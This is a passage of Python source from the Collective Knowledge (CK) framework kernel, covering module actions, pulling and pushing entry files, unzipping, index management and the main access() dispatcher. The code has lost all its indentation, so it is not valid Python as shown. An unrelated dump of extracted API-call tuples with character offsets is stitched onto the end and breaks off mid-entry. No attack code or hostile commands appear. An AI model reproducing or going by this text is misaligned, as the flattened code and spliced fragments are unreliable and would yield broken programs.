return {'return':1, 'error':'module UOA is not defined'}
if duoa!='':
muoa=duoa
duoa=''
# Find path to module
ii={'module_uoa':cfg['module_name'],
'data_uoa':muoa}
if ruoa!='': ii['repo_uoa']=ruoa
r=load(ii)
if r['return']>0: return r
pp=r['path']
dd=r['dict']
actions=dd.get('actions',{})
actions_redirect=dd.get('actions_redirect',{})
# Check func and desc
if o=='con':
if func=='':
r=inp({'text':'Add action function (or Enter to stop): '})
func=r['string']
if func!='':
# if fweb=='':
# r1=inp({'text':'Support web (y/N): '})
# fweb=r1['string'].lower()
# if fweb=='y' or fweb=='yes': fweb='yes'
# else: fweb=''
if desc=='':
r1=inp({'text':'Add action description: '})
desc=r1['string']
# Check if empty
if func=='':
return {'return':1, 'error':'action (function) is not defined'}
if len(func)>0 and func[0].isdigit():
       return {'return':1, 'error':'action name should not start with a number'}
if cfg.get('allowed_action_names','')!='':
import re
anames=cfg.get('allowed_action_names','')
if not re.match(anames, func):
return {'return':1, 'error':'found disallowed characters in the action name (allowed: "'+anames+'")'}
if func in actions:
return {'return':1, 'error':'action (function) already exists in the module'}
if '-' in func:
func1=func.replace('-','_')
actions_redirect[func]=func1
# Adding actions
actions[func]={}
if desc!='': actions[func]['desc']=desc
if fweb!='': actions[func]['for_web']=fweb
dd['actions']=actions
dd['actions_redirect']=actions_redirect
if i.get('skip_appending_dummy_code','')!='yes':
ii={'module_uoa':cfg['module_name'],
'data_uoa':cfg['module_name']}
r=load(ii)
if r['return']>0: return r
px=r['path']
pd=r['dict']
pma=os.path.join(px, pd['dummy_module_action'])
# Load module action dummy
r=load_text_file({'text_file':pma})
if r['return']>0: return r
spma=r['string']
# Load current module
pmx=os.path.join(pp, cfg['module_full_code_name'])
r=load_text_file({'text_file':pmx})
if r['return']>0: return r
spm=r['string']
# Update
if func in actions_redirect:
func=actions_redirect[func]
spm+='\n'+spma.replace('$#action#$', func).replace('$#desc#$',desc)
# Write current module
rx=save_text_file({'text_file':pmx, 'string':spm})
if rx['return']>0: return rx
# Update data entry
if o=='con': out('')
ii={'module_uoa':cfg['module_name'],
'data_uoa':muoa,
'dict':dd,
'out':o,
'sort_keys':'yes'}
if ruoa!='': ii['repo_uoa']=ruoa
r=update(ii)
if r['return']>0: return r
return r
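
# Illustrative usage (a sketch; the module and action names are hypothetical):
#
#   r=add_action({'module_uoa':'my-module', 'func':'run',
#                 'desc':'run experiment', 'skip_appending_dummy_code':'yes'})
#   if r['return']>0: out(r['error'])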
##############################################################################
# Remove action from a module
#
# TARGET: CK kernel and low-level developers
def remove_action(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - normally should be 'module' already
              data_uoa            - UOA of the module from which the action is removed
func - action
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output of 'update' function
}
"""
# Check if global writing is allowed
r=check_writing({})
if r['return']>0: return r
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
func=i.get('func','')
if muoa=='':
return {'return':1, 'error':'module UOA is not defined'}
if duoa!='':
muoa=duoa
duoa=''
# Find path to module
ii={'module_uoa':cfg['module_name'],
'data_uoa':muoa}
if ruoa!='': ii['repo_uoa']=ruoa
r=load(ii)
if r['return']>0: return r
pp=r['path']
dd=r['dict']
actions=dd.get('actions',{})
# Check func and desc
if o=='con':
if func=='':
r=inp({'text':'Enter function to be removed (or Enter to quit) - note that we remove only reference to this function from the module meta: '})
func=r['string']
# Check if empty
if func=='':
return {'return':1, 'error':'action (function) is not defined'}
if func not in actions:
return {'return':1, 'error':'action (function) is not found in the module'}
del (actions[func])
dd['actions']=actions
# Update data entry
if o=='con': out('')
ii={'module_uoa':cfg['module_name'],
'data_uoa':muoa,
'dict':dd,
'substitute':'yes',
'sort_keys':'yes',
'out':o}
if ruoa!='': ii['repo_uoa']=ruoa
r=update(ii)
if r['return']>0: return r
if o=='con':
out('')
out('Reference to the function "'+func+'" was removed from module meta. Function body was not removed from the python code')
return r
##############################################################################
# List actions in a module
#
# TARGET: CK kernel and low-level developers
def list_actions(i):
"""
Input: {
(repo_uoa) - repo UOA
(module_uoa) - module_uoa, if =="", use kernel
(data_uoa)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
actions - list of actions
}
"""
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if muoa!='':
if duoa!='':
muoa=duoa
duoa=''
# Find path to module 'module' to get dummies
ii={'action':'load',
'module_uoa':cfg['module_name'],
'data_uoa':muoa,
'common_func':'yes'}
if ruoa!='': ii['repo_uoa']=ruoa
r=access(ii)
if r['return']>0: return r
dd=r['dict']
actions=dd.get('actions',{})
else:
actions=cfg['actions']
# If console, print actions
if o=='con':
for q in sorted(actions.keys()):
s=q
desc=actions[q].get('desc','')
if desc!='': s+=' - '+desc
out(s)
return {'return':0, 'actions':actions}
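
# Illustrative usage (a sketch): print all kernel-level actions to the console
#
#   r=list_actions({'out':'con'})
#   # r['actions'] maps each action name to its meta (including 'desc')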
##############################################################################
# Pull data
#
# TARGET: CK kernel and low-level developers
def pull(i):
"""
Input: {
(repo_uoa) - repo UOA, if needed
module_uoa - module UOA
data_uoa - data UOA
(filename) - filename (with path) (if empty, set archive to 'yes')
or
(cid[0])
if empty, create an archive of the entry
(archive) - if 'yes' pull whole entry as zip archive using filename or ck_archive.zip
(all) - if 'yes' and archive, add even special directories (.cm, .svn, .git, etc)
(out) - if 'json' or 'json_file', encode file and return in r
(skip_writing) - if 'yes', do not write file (not archive) to current directory
(pattern) - return only files with this pattern
              (patterns)          - multiple patterns (useful to pack multiple points in experiments)
(encode_file) - if 'yes', encode file
(skip_tmp) - if 'yes', skip tmp files and directories
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
(file_content_base64) - if i['to_json']=='yes', encoded file
(filename) - filename to record locally
}
"""
o=i.get('out','')
tj=False
if o=='json' or o=='json_file' or i.get('encode_file','')=='yes':
tj=True
st=i.get('skip_tmp','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
pat=i.get('pattern','')
pats=i.get('patterns',[])
if pat!='':
pats.append(pat)
fn=i.get('filename','')
if fn=='':
x=i.get('cids',[])
if len(x)>0:
fn=x[0]
# Attempt to load data (to find path, etc)
r=load({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
p=r['path']
muoa=r['module_uoa']
duoa=r['data_uoa']
dd=r['dict']
# How output
sw=i.get('skip_writing','')
# Prepare output
rr={'return':0}
# Check what to pull
pfn=''
if fn=='':
i['archive']='yes'
delete_file=''
if i.get('archive','')!='yes':
# Get file
pfn=os.path.normpath(os.path.join(p,fn))
# Check that file is not getting outside paths ...
if not pfn.startswith(p):
return {'return':1, 'error':'path of file is outside entry'}
if not os.path.isfile(pfn):
return {'return':1, 'error':'file not found'}
if not tj and sw!='yes':
# Copy file to current directory
if os.path.isfile(fn):
return {'return':1, 'error':'file already exists in the current directory'}
# Copy file
import shutil
shutil.copyfile(pfn,fn)
py=os.path.split(fn)
rr['filename']=py[1]
else:
# Prepare archive name
if fn!='':
# Check that file is not getting outside paths ...
fn=os.path.normpath(os.path.join(os.getcwd(),fn))
          if not fn.startswith(os.getcwd()):
return {'return':1, 'error':'archive filename should not have path'}
else:
if tj:
# Generate tmp file
import tempfile
fd, fn=tempfile.mkstemp(suffix='.tmp', prefix='ck-') # suffix is important - CK will delete such file!
os.close(fd)
os.remove(fn)
delete_file=fn
else:
fn=cfg['default_archive_name']
pfn=fn
if os.path.isfile(pfn):
return {'return':1, 'error':'archive file already exists in the current directory'}
# Prepare archive
import zipfile
zip_method=zipfile.ZIP_DEFLATED
gaf=i.get('all','')
fl={}
if len(pats)>0:
for q in pats:
r=list_all_files({'path':p, 'all':gaf, 'pattern':q})
if r['return']>0: return r
flx=r['list']
for k in flx:
fl[k]=flx[k]
else:
r=list_all_files({'path':p, 'all':gaf})
if r['return']>0: return r
fl=r['list']
# Write archive
try:
f=open(pfn, 'wb')
z=zipfile.ZipFile(f, 'w', zip_method)
for fn in fl:
if st!='yes' or not fn.startswith('tmp'):
p1=os.path.join(p, fn)
z.write(p1, fn, zip_method)
z.close()
f.close()
except Exception as e:
return {'return':1, 'error':'failed to prepare archive ('+format(e)+')'}
# If add to JSON
if tj:
r=convert_file_to_upload_string({'filename':pfn})
if r['return']>0: return r
rr['file_content_base64']=r['file_content_base64']
if delete_file!='': os.remove(delete_file)
return rr
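
# Illustrative usage (a sketch; the entry name is hypothetical) - pull the
# whole entry as a zip archive into the current directory:
#
#   r=pull({'module_uoa':'dataset', 'data_uoa':'my-entry', 'archive':'yes'})
#   if r['return']>0: out(r['error'])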
##############################################################################
# Push data
#
# TARGET: CK kernel and low-level developers
def push(i):
"""
Input: {
(repo_uoa) - repo UOA, if needed
module_uoa - module UOA
data_uoa - data UOA
(filename) - local filename
or
(cid[0])
(extra_path) - extra path inside entry (create if doesn't exist)
(file_content_base64) - if !='', take its content and record into filename
(archive) - if 'yes' push to entry and unzip ...
(overwrite) - if 'yes', overwrite files
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
# Check if global writing is allowed
r=check_writing({})
if r['return']>0: return r
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
# Check file
fn=i.get('filename','')
if fn=='':
x=i.get('cids',[])
if len(x)>0:
fn=x[0]
if fn=='':
return {'return':1, 'error':'filename is empty'}
fcb=False
if 'file_content_base64' in i:
import base64
bin=base64.urlsafe_b64decode(i['file_content_base64'].encode('utf8')) # convert from unicode to str since base64 works on strings
# should be safe in Python 2.x and 3.x
fcb=True
else:
if not os.path.isfile(fn):
return {'return':1, 'error':'file '+fn+' not found'}
# Attempt to load data (to find path, etc)
rx=load({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if rx['return']>0: return rx
p=rx['path']
muoa=rx['module_uoa']
duoa=rx['data_uoa']
dd=rx['dict']
px=os.path.normpath(os.path.join(p, cfg['subdir_ck_ext']))
ruoa=rx['repo_uoa']
ruid=rx['repo_uid']
# Check repo/module writing
ii={'module_uoa':muoa, 'repo_uoa':ruoa, 'repo_uid':ruid}
r=check_writing(ii)
if r['return']>0: return r
rd=r.get('repo_dict',{})
rshared=rd.get('shared','')
rsync=rd.get('sync','')
# Prepare path
p1=i.get('extra_path','')
if p1!='':
p2=os.path.normpath(os.path.join(p,p1))
if not p2.startswith(p):
return {'return':1,'error':'extra path is outside entry'}
p=p2
# Create missing dirs
if not os.path.isdir(p): os.makedirs(p)
overwrite=i.get('overwrite','')
# Copy or record file
p3=os.path.normpath(os.path.join(p, fn))
    if not p3.startswith(p):
       return {'return':1,'error':'file path is outside entry'}
if p3.startswith(px):
return {'return':1, 'error':'path points to the special directory with meta info'}
if os.path.isfile(p3) and overwrite!='yes':
return {'return':1,'error':'file already exists in the entry'}
if fcb:
try:
f=open(p3, 'wb')
f.write(bin)
f.close()
except Exception as e:
return {'return':1, 'error':'problem writing text file='+p3+' ('+format(e)+')'}
else:
import shutil
shutil.copyfile(fn, p3)
# Process if archive
y=''
if i.get('archive','')=='yes':
rx=unzip_file({'archive_file':p3,
'path':p,
'overwrite':overwrite,
'delete_after_unzip':'yes'})
if rx['return']>0: return rx
y='and unziped '
if rshared!='':
ppp=os.getcwd()
pp=os.path.split(p)
pp0=pp[0]
pp1=pp[1]
os.chdir(pp0)
ss=cfg['repo_types'][rshared]['add'].replace('$#files#$', pp1)
rx=os.system(ss)
os.chdir(ppp)
if o=='con':
out('File was pushed '+y+'successfully!')
return {'return':0}
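
# Illustrative usage (a sketch; the entry and file names are hypothetical):
#
#   r=push({'module_uoa':'dataset', 'data_uoa':'my-entry',
#           'filename':'results.zip', 'archive':'yes', 'overwrite':'yes'})
#   if r['return']>0: out(r['error'])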
##############################################################################
# Unzip file to a given path
#
# TARGET: end users
def unzip_file(i):
"""
Input: {
archive_file - full path to zip file
(path) - path where unzip (current if empty)
(overwrite) - if 'yes', overwrite
(delete_after_unzip) - if 'yes', delete original zip file after unzipping
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
skipped - list of files which was not overwritten
}
"""
import zipfile
p=i.get('path','')
if p=='':
p=os.getcwd()
p3=i['archive_file']
overwrite=i.get('overwrite','')
dau=i.get('delete_after_unzip','')
s=[]
f=open(p3,'rb')
z=zipfile.ZipFile(f)
for d in z.namelist():
if not d.startswith('.') and not d.startswith('/') and not d.startswith('\\'):
pp=os.path.join(p,d)
if d.endswith('/'):
# create directory
if not os.path.exists(pp): os.makedirs(pp)
else:
ppd=os.path.dirname(pp)
if not os.path.exists(ppd): os.makedirs(ppd)
# extract file
if os.path.isfile(pp) and overwrite!='yes':
s.append(d)
else:
fo=open(pp, 'wb')
fo.write(z.read(d))
fo.close()
f.close()
if dau=='yes':
os.remove(p3)
return {'return':0, 'skipped':s}
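
# Illustrative usage (a sketch; the archive name is hypothetical):
#
#   r=unzip_file({'archive_file':'ck_archive.zip'})
#   # r['skipped'] lists files which already existed and were left untouched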
##############################################################################
# List files in a given entry
#
# TARGET: end users
def list_files(i):
"""
Input: {
(repo_uoa)
(module_uoa)
(data_uoa)
parameters for function 'list_all_files'
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output of list all files
}
"""
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
# Get info about entry
r=load({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
p=r['path']
# Get files
ii={'path':p}
if i.get('limit','')!='': ii['limit']=i['limit']
if i.get('number','')!='': ii['number']=i['number']
if i.get('all','')!='': ii['all']=i['all']
r=list_all_files(ii)
if r['return']>0: return r
if o=='con':
for q in r.get('list',[]):
out(q)
return r
##############################################################################
# convert_cm_to_ck
#
# TARGET: internal use
def convert_cm_to_ck(i): # pragma: no cover
"""
Input: {
(repo_uoa) - repo UOA with wild cards
(module_uoa) - module UOA with wild cards
(data_uoa) - data UOA with wild cards
(print_full) - if 'yes', show CID (repo_uoa:module_uoa:data_uoa)
              (print_time)        - if 'yes', print elapsed time at the end
(ignore_update) - if 'yes', do not add info about update
(time_out) - in sec. (default -1, i.e. no timeout)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import sys
o=i.get('out','')
# Check wildcards
lst=[]
to=i.get('time_out','')
if to=='': to='-1'
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if ruoa=='': ruoa='*'
if muoa=='': muoa='*'
if duoa=='': duoa='*'
pf=i.get('print_full','')
if pf=='': pf='yes'
ii={}
ii['out']=o
ii['repo_uoa']=ruoa
ii['module_uoa']=muoa
ii['data_uoa']=duoa
ii['filter_func_addr']=getattr(sys.modules[__name__], 'filter_convert_cm_to_ck')
ii['do_not_add_to_lst']='yes'
    ii['print_time']=i.get('print_time','')
ii['print_full']=pf
ii['time_out']=to
ii['ignore_update']=i.get('ignore_update','')
return list_data(ii)
##############################################################################
# convert cm to ck filter
#
# TARGET: internal use
def filter_convert_cm_to_ck(i): # pragma: no cover
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
o=i.get('out','')
i['out']=''
rx=load(i)
i['out']=o
if rx['return']>0: return rx
ruid=rx['repo_uid']
muid=rx['module_uid']
duid=rx['data_uid']
d=rx['dict']
info=rx.get('info',{})
# Converting
if 'cm_access_control' in d:
if 'cm_outdated' not in info: info['cm_outdated']={}
info['cm_outdated']['cm_access_control']=d['cm_access_control']
del (d['cm_access_control'])
if 'cm_display_as_alias' in d:
info['data_name']=d['cm_display_as_alias']
del(d['cm_display_as_alias'])
if 'powered_by' in d:
if 'cm_outdated' not in info: info['cm_outdated']={}
info['cm_outdated']['powered_by']=d['powered_by']
del(d['powered_by'])
if 'cm_description' in d:
info['description']=d['cm_description']
del(d['cm_description'])
if 'cm_updated' in d:
dcu=d['cm_updated'][0]
cidate=dcu.get('cm_iso_datetime','')
cuoa=dcu.get('cm_user_uoa','')
if 'control' not in info:
info['control']={}
if cidate!='':
info['control']['iso_datetime']=cidate
if cuoa!='':
info['control']['author_uoa']=cuoa
info['control']['engine']='CM'
info['control']['version']=[]
del(d['cm_updated'])
if 'version' in info: del(info['version'])
# Saving
ii={'action':'update',
'repo_uoa':ruid,
'module_uoa':muid,
'data_uoa':duid,
'substitute':'yes',
'dict':d,
'info':info,
'ignore_update':i.get('ignore_update','')
}
rx=update(ii)
return rx
##############################################################################
# add index
#
# TARGET: CK kernel and low-level developers
def add_index(i):
"""
Input: {
(repo_uoa) - repo UOA with wild cards
(module_uoa) - module UOA with wild cards
(data_uoa) - data UOA with wild cards
(print_full) - if 'yes', show CID (repo_uoa:module_uoa:data_uoa)
              (print_time)        - if 'yes', print elapsed time at the end
(time_out) - in sec. (default -1, i.e. no timeout)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import sys
o=i.get('out','')
# Check wildcards
lst=[]
to=i.get('time_out','')
if to=='': to='-1'
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if ruoa=='': ruoa='*'
if muoa=='': muoa='*'
if duoa=='': duoa='*'
pf=i.get('print_full','')
if pf=='': pf='yes'
ii={}
ii['out']=o
ii['repo_uoa']=ruoa
ii['module_uoa']=muoa
ii['data_uoa']=duoa
ii['filter_func_addr']=getattr(sys.modules[__name__], 'filter_add_index')
ii['do_not_add_to_lst']='yes'
ii['print_time']=i.get('print_time','')
ii['print_full']=pf
ii['time_out']=to
return list_data(ii)
##############################################################################
# zip entries (call repo)
#
# TARGET: CK kernel and low-level developers
def zip(i):
"""
Input: {
(repo_uoa) - repo UOA with wild cards
(module_uoa) - module UOA with wild cards
(data_uoa) - data UOA with wild cards
(archive_path) - if '' create inside repo path
(archive_name) - if !='' use it for zip name
              (auto_name)         - if 'yes', generate zip name from data_uoa: ckr-<repo_uoa>.zip
(bittorent) - if 'yes', generate zip name for BitTorrent: ckr-<repo_uid>-YYYYMMDD.zip
(overwrite) - if 'yes', overwrite zip file
(store) - if 'yes', store files instead of packing
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
if i.get('data_uoa','')!='': del(i['data_uoa'])
ruoa=i.get('repo_uoa','')
if ruoa!='':
if ruoa.find('*')<0 and ruoa.find('?')<0:
i['data_uoa']=ruoa
else:
del(i['repo_uoa'])
i['module_uoa']=cfg['module_repo_name']
i['data']=i.get('cid','')
if i.get('cid','')!='': del(i['cid'])
return access(i)
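
# Illustrative usage (a sketch): archive the standard 'local' repo with an
# auto-generated name (ckr-local.zip); the call is redirected to the repo module:
#
#   r=zip({'repo_uoa':'local', 'auto_name':'yes'})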
##############################################################################
# add index filter
#
# TARGET: CK kernel and low-level developers
def filter_add_index(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
o=i.get('out','')
i['out']=''
rx=load(i)
i['out']=o
if rx['return']>0: return rx
muid=rx['module_uid']
duid=rx['data_uid']
path='/'+muid+'/'+duid+'/1'
r=access_index_server({'request':'DELETE', 'path':path})
if r['return']>0: return r
r=access_index_server({'request':'PUT', 'path':path, 'dict':rx})
return r
##############################################################################
# delete index
#
# TARGET: CK kernel and low-level developers
def delete_index(i):
"""
Input: {
(repo_uoa) - repo UOA with wild cards
(module_uoa) - module UOA with wild cards
(data_uoa) - data UOA with wild cards
              (print_time)        - if 'yes', print elapsed time at the end
(time_out) - in sec. (default -1, i.e. no timeout)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import sys
o=i.get('out','')
# Check wildcards
lst=[]
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if ruoa=='': ruoa='*'
if muoa=='': muoa='*'
if duoa=='': duoa='*'
ii={}
ii['out']=o
ii['repo_uoa']=ruoa
ii['module_uoa']=muoa
ii['data_uoa']=duoa
ii['filter_func_addr']=getattr(sys.modules[__name__], 'filter_delete_index')
ii['do_not_add_to_lst']='yes'
return list_data(ii)
##############################################################################
# delete index filter
#
# TARGET: CK kernel and low-level developers
def filter_delete_index(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
o=i.get('out','')
i['out']=''
r=load(i)
i['out']=o
if r['return']>0: return r
muid=r['module_uid']
duid=r['data_uid']
path='/'+muid+'/'+duid+'/1'
return access_index_server({'request':'DELETE', 'path':path})
##############################################################################
# Remove files and dirs even if read only
#
# TARGET: internal use
def rm_read_only(f,p,e):
import os
import stat
import errno
ex=e[1]
os.chmod(p,stat.S_IRWXU|stat.S_IRWXG|stat.S_IRWXO)
f(p)
return
############################################################################
# Universal access to all CK functions (Unified JSON/dictionary API)
#
# TARGET: end users
def access(i):
"""
Input: Can be dictionary or string (string will be converted to dictionary)
{
action
module_uoa or CID -> converted to cid
or
(cid1) - if doesn't have = and doesn't start from -- or - or @ -> appended to cids[]
(cid2) - if doesn't have = and doesn't start from -- or - or @ -> appended to cids[]
(cid3) - if doesn't have = and doesn't start from -- or - or @ -> appended to cids[]
or
(repo_uoa)
(module_uoa)
(data_uoa)
(out=type) Module output
== '' - none
== 'con' - console interaction (if from CMD, default)
== 'json' - return dict as json to console
== 'json_with_sep' - separation line and return dict as json to console
== 'json_file' - return dict as json to file
(out_file) Output file if out=='json_file'
(con_encoding) - force encoding for IO
(ck_profile) - if 'yes', profile CK
INPUT TO A GIVEN FUNCTION
              NOTE: If INPUT is a string, it will be converted to an INPUT dictionary as follows (the same as the CK command line):
ck key1=value1 -> converted to {key1:value1}
-key10 -> converted to {key10:"yes"}
-key11=value11 -> converted to {key11:value11}
--key12 -> converted to {key12:"yes"}
--key13=value13 -> converted to {key13:value13}
@file_json -> JSON from this file will be merged with INPUT
                    @@           -> CK will ask the user to enter JSON manually from the console and merge it with INPUT
@@key -> Enter JSON manually from console and merge with INPUT under this key
@@@cmd_json -> convert string to JSON (special format) and merge with INPUT
-- xyz -> add everything after -- to "unparsed_cmd" key in INPUT
When string is converted to INPUT dictionary, "cmd" variable is set to True
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
OUTPUT FROM A GIVEN FUNCTION
}
"""
global con_encoding
# # Set fresh configuration for each access - very costly
# if cfg.get('loading_config','') == '':
# cfg['loading_config'] = 'yes'
# r=access({'action':'load',
# 'repo_uoa':cfg['repo_name_default'],
# 'module_uoa':cfg['subdir_kernel'],
# 'data_uoa':cfg['subdir_kernel_default']})
# if r['return']==0:
# cfg.update(r['dict'])
#
# r=access({'action':'load',
# 'repo_uoa':cfg['repo_name_local'],
# 'module_uoa':cfg['subdir_kernel'],
# 'data_uoa':cfg['subdir_kernel_default']})
# if r['return']==0:
# cfg.update(r['dict'])
# cfg['loading_config'] = ''
rr={'return':0}
ii={}
cmd=False
o=''
### If input is string, split into list and process in the next condition
if type(i)==str:
cmd=True
x=i.split(' ')
i=x
### If input is a list
if type(i)==list:
if len(i)==1 and i[0].strip()=='test_install':
return rr # installation test
cmd=True
rr=convert_ck_list_to_dict(i)
if rr['return']==0:
i=rr.get('ck_dict',{})
if i.get('out','')=='': i['out']='con' # Default output is console
# if called from CMD or with string
o=''
if rr['return']==0:
# Check output mode
o=i.get('out','')
### If profile
cp=i.get('ck_profile','')
if cp=='yes':
import time
start_time = time.time()
### Process request ######################################
if i.get('con_encoding','')!='': con_encoding=i['con_encoding']
### Process action ###################################
rr=init({})
if rr['return']==0:
# Run module with a given action
rr=perform_action(i)
if rr.get('out','')!='': o=rr['out']
if cp=='yes':
elapsed_time=time.time()-start_time
rr['ck_profile_time']=elapsed_time
if o=='con':
out('CK profile time: '+str(elapsed_time)+' sec.')
# Finalize call (check output) ####################################
if o=='json' or o=='json_with_sep':
if o=='json_with_sep': out(cfg['json_sep'])
rr1=dumps_json({'dict':rr})
if rr1['return']==0:
s=rr1['string']
out(s)
elif o=='json_file':
fn=i.get('out_file','')
if fn=='':
rr['return']=1
rr['error']='out==json_file but out_file is not defined in kernel access function'
else:
rr1=save_json_to_file({'json_file':fn, 'dict':rr})
if rr1['return']>0:
rr['return']=1
rr['error']=rr1['error']
# If error and CMD, output error to console
if cmd:
if rr['return']>0:
x=''
if type(i)==dict:
x=i.get('module_uoa','')
if x!='':
x='['+x+'] '
          #FGG added this to fix a temporary error with ElasticSearch indexing when the index is empty
out(str(cfg['error'])+x+str(rr['error'])+'!')
return rr
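
# Illustrative usage (a sketch; the module name and tags are hypothetical)
# showing the dict and CMD-style string forms described above:
#
#   r=access({'action':'search', 'module_uoa':'dataset', 'tags':'image'})
#   r=access('search dataset --tags=image')   # converted to the same dict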
##############################################################################
if __name__ == "__main__":
r=access(sys.argv[1:])
if 'return' not in r:
raise Exception('CK access function should always return key \'return\'!')
exit(int(r['return']))
'os.path.split', 'os.path.split', (['pn'], {}), '(pn)\n', (207767, 207771), False, 'import os\n'), ((207814, 207827), 'os.chdir', 'os.chdir', (['pp0'], {}), '(pp0)\n', (207822, 207827), False, 'import os\n'), ((207908, 207921), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (207917, 207921), False, 'import os\n'), ((207930, 207943), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (207938, 207943), False, 'import os\n'), ((210822, 210829), 'copy', 'copy', (['i'], {}), '(i)\n', (210826, 210829), False, 'import copy\n'), ((212883, 212902), 'os.path.join', 'os.path.join', (['p', 'fn'], {}), '(p, fn)\n', (212895, 212902), False, 'import os\n'), ((212928, 212965), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']"], {}), "(p, cfg['subdir_ck_ext'])\n", (212940, 212965), False, 'import os\n'), ((213387, 213398), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (213396, 213398), False, 'import os\n'), ((213406, 213419), 'os.chdir', 'os.chdir', (['px0'], {}), '(px0)\n', (213414, 213419), False, 'import os\n'), ((213500, 213513), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (213509, 213513), False, 'import os\n'), ((213549, 213562), 'os.remove', 'os.remove', (['p1'], {}), '(p1)\n', (213558, 213562), False, 'import os\n'), ((213618, 213657), 'shutil.rmtree', 'shutil.rmtree', (['p1'], {'onerror': 'rm_read_only'}), '(p1, onerror=rm_read_only)\n', (213631, 213657), False, 'import shutil\n'), ((213686, 213699), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (213694, 213699), False, 'import os\n'), ((236751, 236762), 'time.time', 'time.time', ([], {}), '()\n', (236760, 236762), False, 'import time\n'), ((245734, 245752), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (245748, 245752), False, 'import os\n'), ((245764, 245823), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_meta_old']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_meta_old'])\n", (245776, 245823), False, 'import os\n'), ((252705, 252760), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_meta']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_meta'])\n", (252717, 252760), False, 'import os\n'), ((254523, 254568), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': '""".tmp"""', 'prefix': '"""ck-"""'}), "(suffix='.tmp', prefix='ck-')\n", (254539, 254568), False, 'import tempfile\n'), ((254576, 254589), 'os.close', 'os.close', (['fd1'], {}), '(fd1)\n', (254584, 254589), False, 'import os\n'), ((254597, 254611), 'os.remove', 'os.remove', (['fn1'], {}), '(fn1)\n', (254606, 254611), False, 'import os\n'), ((254629, 254674), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': '""".tmp"""', 'prefix': '"""ck-"""'}), "(suffix='.tmp', prefix='ck-')\n", (254645, 254674), False, 'import tempfile\n'), ((254682, 254695), 'os.close', 'os.close', (['fd2'], {}), '(fd2)\n', (254690, 254695), False, 'import os\n'), ((254703, 254717), 'os.remove', 'os.remove', (['fn2'], {}), '(fn2)\n', (254712, 254717), False, 'import os\n'), ((254881, 254895), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (254890, 254895), False, 'import os\n'), ((255116, 255135), 'os.path.isfile', 'os.path.isfile', (['fn1'], {}), '(fn1)\n', (255130, 255135), False, 'import os\n'), ((255162, 255181), 'os.path.isfile', 'os.path.isfile', (['fn2'], {}), '(fn2)\n', (255176, 255181), False, 'import os\n'), ((263512, 263555), 'os.path.join', 'os.path.join', (['px', "pd['dummy_module_action']"], {}), "(px, pd['dummy_module_action'])\n", (263524, 263555), False, 'import os\n'), ((263733, 263779), 'os.path.join', 
